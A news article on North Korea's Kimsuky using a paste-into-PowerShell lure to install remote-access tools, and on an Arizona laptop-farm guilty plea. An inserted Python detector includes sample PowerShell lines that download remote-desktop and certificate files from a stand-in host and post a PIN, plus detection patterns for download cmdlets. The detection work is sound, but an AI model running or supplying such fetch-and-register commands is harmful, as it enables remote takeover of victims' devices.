North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack

In their latest cyberattack, North Korean hackers are taking advantage of a PowerShell exploit to hijack devices.

A North Korea-linked threat actor known as Kimsuky has been seen employing a new tactic that tricks targets into running PowerShell as an administrator and then instructs them to paste and execute malicious code provided by the attacker.

According to the Microsoft Threat Intelligence team, the threat actor poses as a South Korean government official, gradually building a relationship with the target before sending a spear-phishing email that includes a PDF attachment.

To view the supposed PDF document, victims are encouraged to click a URL that outlines steps to register their Windows system. This registration link prompts them to open PowerShell as an administrator and copy/paste the code snippet shown into the terminal for execution.

If the victim complies, the malicious code downloads and installs a browser-based remote desktop tool, along with a certificate file containing a hardcoded PIN from a remote server.

Microsoft explained that the code then sends a web request to a remote server to register the victim’s device using the downloaded certificate and PIN, enabling the threat actor to access the device and perform data exfiltration.
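A defender-side illustration of the chain described above, added here and not part of Microsoft's report or this article: it correlates constructed Sysmon-style process-creation records with PowerShell script block log entries (Event ID 4104) and flags pasted code from an elevated, interactive console that fetches several remote objects and mentions certificate, PIN or registration material. The event shapes, field names and example.invalid URLs are assumptions.

```python
import re

# Constructed sample telemetry, not taken from the article: one Sysmon-style
# process-creation record per PowerShell host, plus PowerShell script block log
# entries (Event ID 4104) correlated to their host by pid.
EVENTS = [
    {"type": "process_create", "pid": 4120, "integrity": "High",
     "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""},
    {"type": "script_block", "pid": 4120, "text":
     "Invoke-WebRequest https://example.invalid/rd.zip -OutFile $env:TEMP\\rd.zip; "
     "Invoke-WebRequest https://example.invalid/cert.pem -OutFile $env:TEMP\\cert.pem; "
     "Invoke-WebRequest https://example.invalid/register -Method POST -Body $pin"},
    {"type": "process_create", "pid": 5310, "integrity": "High",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"type": "script_block", "pid": 5310, "text":
     "Invoke-WebRequest https://intranet.example.invalid/cert.pem -OutFile cert.pem; Register-Asset"},
    {"type": "script_block", "pid": 4120, "text": "Get-Date"},
]

DOWNLOAD = re.compile(r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|"
                      r"downloadstring|downloadfile|start-bitstransfer)\b")
STAGING = re.compile(r"(?i)(certificat|\.pem|\.pfx|\bpin\b|remote ?desktop|register)")
SCRIPTED = re.compile(r"(?i)\s-(file|command|c|encodedcommand|e|ec)\b")

def interactive_elevated_hosts(events):
    """pids of PowerShell hosts running at High integrity with nothing to execute
    on their command line: a console the user opened 'as administrator' and then
    typed or pasted into. Script-file and encoded-command launches are excluded."""
    return {e["pid"] for e in events
            if e["type"] == "process_create"
            and e["integrity"] == "High"
            and "powershell" in e["cmdline"].lower()
            and not SCRIPTED.search(e["cmdline"])}

def detect_clickfix(events):
    """Flag script blocks from such consoles that fetch several remote objects and
    mention certificate/PIN/registration material, the staging pattern described."""
    hosts = interactive_elevated_hosts(events)
    alerts = []
    for e in events:
        if e["type"] != "script_block" or e["pid"] not in hosts:
            continue
        downloads = DOWNLOAD.findall(e["text"])
        staging = STAGING.search(e["text"])
        if len(downloads) >= 2 and staging:
            alerts.append({"pid": e["pid"], "downloads": len(downloads),
                           "keyword": staging.group(0)})
    return alerts
```

Pasted commands never appear on the PowerShell host's command line, so script block logging (or an equivalent source) is what makes this chain visible; the command-line check only serves to separate a human-driven console from scheduled or management-tool launches.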

The tech giant noted that it has observed this tactic in limited attacks since January 2025, marking a shift from the threat actor’s typical methods.

It’s important to mention that Kimsuky is not the only North Korean hacking group to use this compromise strategy. In December 2024, threat actors associated with the Contagious Interview campaign were reported to be deceiving users into copying and executing a malicious command on their Apple macOS systems through the Terminal app, claiming it resolves an issue with accessing the camera and microphone via the web browser.


Recent months have seen a significant rise in attacks that utilize the ClickFix method, largely because these tactics depend on the targets unwittingly infecting their own devices, which helps them evade security measures.

An Arizona woman has pleaded guilty to operating a laptop farm for North Korean IT workers.

This development follows the U.S. Department of Justice (DoJ) announcing that a 48-year-old woman from Arizona admitted her involvement in a fraudulent scheme that enabled North Korean cybercriminals to secure remote positions at over 300 U.S. companies by impersonating American citizens and residents.

According to the department, this operation generated more than $17.1 million in illegal profits for Christina Marie Chapman and North Korea, violating international sanctions from October 2020 to October 2023.

The DoJ stated, “Chapman, an American citizen, collaborated with foreign IT workers from October 2020 to October 2023 to steal the identities of U.S. nationals. She used these identities to apply for remote IT jobs and, to further the scheme, submitted false documents to the Department of Homeland Security.”

“Chapman and her co-conspirators secured positions at numerous U.S. companies, including Fortune 500 firms, often through temporary staffing agencies or other contracting firms.”

The defendant, arrested in May 2024, is accused of operating a laptop farm by hosting several laptops at her home to create the illusion that North Korean workers were physically present in the U.S. In reality, these workers were located in China and Russia, connecting remotely to the companies’ internal systems.

According to the Department of Justice, “Due to the actions of Chapman and her co-conspirators, over 300 U.S. companies were affected, more than 70 identities of U.S. persons were compromised, false information was provided to DHS on over 100 occasions, and more than 70 U.S. individuals had fraudulent tax liabilities created in their names.”

The heightened scrutiny from law enforcement has intensified the IT worker scheme, with reports surfacing about data theft and extortion.

The U.S. Federal Bureau of Investigation (FBI) noted in an advisory last month, “After being detected on company networks, North Korean IT workers have extorted victims by holding stolen proprietary data and code hostage until the companies comply with ransom demands. In some cases, these workers have publicly released proprietary code belonging to victim companies.”
